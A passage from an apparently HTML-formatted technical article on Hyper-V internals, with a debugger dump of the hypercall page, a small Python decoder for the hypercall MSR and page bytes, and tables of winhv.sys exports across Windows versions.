<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004019 0f01c1 vmcall</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000401c c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000401d 8bc8 mov ecx,eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000401f b812000000 mov eax,12h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004024 0f01c1 vmcall</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004027 c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004028 48 dec eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004029 8bc1 mov eax,ecx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000402b 48 dec eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000402c c7c112000000 mov ecx,12h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004032 0f01c1 vmcall</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004035 c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004036 90 nop</span></div>
</td></tr>
</tbody></table>
</div>
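<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The dumps in the table can be turned back into a listing without leaving the debugger transcript. The script below is an added example, not code from the article or from Microsoft: it splits HV_X64_MSR_HYPERCALL into its enable bit and the guest-physical address of the page, reassembles the !dc dwords into bytes, and decodes only the few opcodes that appear on the page. Decoding the same bytes in 64-bit mode is my addition to show why kd printed 0x48 as dec eax: in 64-bit code that byte is a REX.W prefix, and the sequence reads as mov rax,rcx / mov rcx,11h instead.</span></div>

```python
"""Decode a Hyper-V hypercall page as dumped in WinDbg.

Added example, not code from the article: a toy decoder for the opcodes the
article's dumps contain, not a general x86 disassembler.
"""

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]


def decode_hypercall_msr(value):
    """HV_X64_MSR_HYPERCALL: bit 0 enables the page, bits 63:12 hold the guest
    physical page number; returns (enabled, page guest-physical address)."""
    return bool(value & 1), (value >> 12) << 12


def dc_to_bytes(lines):
    """Rebuild the byte stream from '!dc'/'dc' lines: an address followed by
    four dwords, each printed as a little-endian 32-bit value."""
    out = bytearray()
    for line in lines:
        tokens = line.replace("#", " ").split()
        for dword in tokens[1:5]:
            out += int(dword, 16).to_bytes(4, "little")
    return bytes(out)


def disassemble(code, base, bits=32):
    """Decode the opcodes seen on the hypercall page: vmcall/vmmcall, ret, nop,
    mov r,r (8b), mov r,imm (b8+r and c7 /0) and 0x48, which is 'dec eax' in
    32-bit mode but a REX.W prefix in 64-bit mode. Unknown bytes become 'db'."""
    insns, i = [], 0
    while i < len(code):
        start, regs, b = i, REG32, code[i]
        if bits == 64 and 0x40 <= b <= 0x4F:          # REX prefix
            regs = REG64 if b & 8 else REG32           # REX.W -> 64-bit operands
            i += 1
            b = code[i] if i < len(code) else None
        nxt = code[i + 1] if i + 1 < len(code) else -1
        if b == 0x0F and code[i + 1:i + 3] == b"\x01\xC1":
            text, i = "vmcall", i + 3                  # Intel VT-x
        elif b == 0x0F and code[i + 1:i + 3] == b"\x01\xD9":
            text, i = "vmmcall", i + 3                 # AMD-V equivalent
        elif b == 0xC3:
            text, i = "ret", i + 1
        elif b == 0x90:
            text, i = "nop", i + 1
        elif bits == 32 and 0x48 <= b <= 0x4F:
            text, i = f"dec {REG32[b - 0x48]}", i + 1
        elif b == 0x8B and nxt >= 0xC0:                # mod == 11: register to register
            text, i = f"mov {regs[(nxt >> 3) & 7]},{regs[nxt & 7]}", i + 2
        elif b is not None and 0xB8 <= b <= 0xBF:
            size = 8 if regs is REG64 else 4           # REX.W b8+r takes a 64-bit immediate
            imm = int.from_bytes(code[i + 1:i + 1 + size], "little")
            text, i = f"mov {regs[b - 0xB8]},{imm:x}h", i + 1 + size
        elif b == 0xC7 and nxt >= 0xC0 and ((nxt >> 3) & 7) == 0:
            imm = int.from_bytes(code[i + 2:i + 6], "little")
            text, i = f"mov {regs[nxt & 7]},{imm:x}h", i + 6
        else:
            text, i = f"db {code[start]:02x}", start + 1
        insns.append((base + start, code[start:i].hex(), text))
    return insns


def listing(lines, base, bits=32):
    """Format the decoded dump like a kd 'u' listing (address, bytes, text)."""
    return [f"{addr:08x} {hexb:<14} {text}"
            for addr, hexb, text in disassemble(dc_to_bytes(lines), base, bits)]


# Dumps copied from the article's table.
X86_DUMP = [
    "#1ffb1000 c3c1010f 90909090 90909090 90909090 ................",
    "#1ffb1010 90909090 90909090 90909090 90909090 ................",
]
TP2_DUMP = [
    "# 4000 c3c1010f 11b8c88b 0f000000 48c3c101",
    "# 4010 c748c18b 000011c1 c1010f00 b8c88bc3",
    "# 4020 00000012 c3c1010f 48c18b48 0012c1c7",
    "# 4030 010f0000 9090c3c1 90909090 90909090",
]

if __name__ == "__main__":
    for msr in (0x1FFB1001, 0x4001):
        enabled, page = decode_hypercall_msr(msr)
        print(f"MSR 0x40000001 = {msr:#x}: enabled={enabled}, page={page:#x}")
    print("\n".join(listing(X86_DUMP, 0x1FFB1000)[:3]))
    print("--- Server 2016 TP2 page, decoded as 32-bit code (as kd did) ---")
    print("\n".join(listing(TP2_DUMP, 0x4000)))
    print("--- the same bytes decoded as 64-bit code ---")
    print("\n".join(listing(TP2_DUMP, 0x4000, bits=64)))
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The 32-bit listing reproduces the kd output from the table byte for byte; the 64-bit listing is the same page read as x64 code, where the 48 8b c1 / 48 c7 c1 imm32 pairs become mov rax,rcx and mov rcx,11h. Either way, checking that the page begins with vmcall; ret (or vmmcall; ret on AMD) is the first thing to verify when a guest's hypercalls misbehave.</span></div>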
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In Windows Server 2012 the following changes took place in the exports of the winhv.sys driver compared with Windows Server 2008 R2:</span></div>
<div dir="ltr" style="margin-left: -5.75pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="319"></col><col width="319"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Added</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Removed</span></div>
</td></tr>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAddLogicalProcessor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAttachDevice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDetachDevice</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetLogicalProcessorProperty</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetLogicalProcessorRegisters</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetNextQueuedPort </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetSystemInformation</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvInjectSyntheticMachineCheckEvent</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvMapDeviceInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvPrepareForSleep </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvProcessorIndexToLpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvProcessorNumberToVpIndex</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvRemoveLogicalProcessor</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetLogicalProcessorProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSetLogicalProcessorRegisters</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvUnmapDeviceInterrupt</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvOnInterrupt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvReclaimInterruptVector</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvSupplyInterruptVector </span></div>
</td></tr>
</tbody></table>
</div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Exports of Winhv.sys in client versions of Windows (as you can see, many functions were removed from the Windows 10 winhv.sys):</span></div>
<div dir="ltr" style="margin-left: -5.75pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="219"></col><col width="256"></col><col width="187"></col></colgroup><tbody>
<tr style="height: 17px;"><td colspan="2" style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windows 8.1 x86</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Windows 10 x86</span></div>
</td></tr>
<tr style="height: 647px;"><td style="border-color: rgb(0, 0, 0); border-style: solid; border-width: 1px 0px 1px 1px; padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAddLogicalProcessor </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAllocateOverlayPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAllocatePartitionSintIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAllocatePortId </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAllocateSingleSintIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAssertVirtualInterrupt </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvAttachDevice </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCancelTimer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvClearVirtualInterrupt </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvConfigureProfiler </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvConnectPort </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCreateEventLogBuffer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCreatePartition </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCreatePort </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCreateTimer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvCreateVp </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDeleteEventLogBuffer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDeletePartition </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDeletePort </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDeleteTimer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDeleteVp </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDepositMemory </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDetachDevice </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvDisconnectPort </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFinalizeEventLogBufferGroup </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFlushEventLogBuffer </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFreeOverlayPages </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFreePartitionSintIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFreePortId </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvFreeSingleSintIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetCurrentVpIndex </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetLogicalProcessorProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetLogicalProcessorRegisters </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetLogicalProcessorRunTime </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetMemoryBalance </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetNextChildPartition </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetNextQueuedPort </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionId </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPartitionProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetPortProperty </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetSintEventFlags </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetSintMessage </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetSystemInformation </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">WinHvGetVpRegisters </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
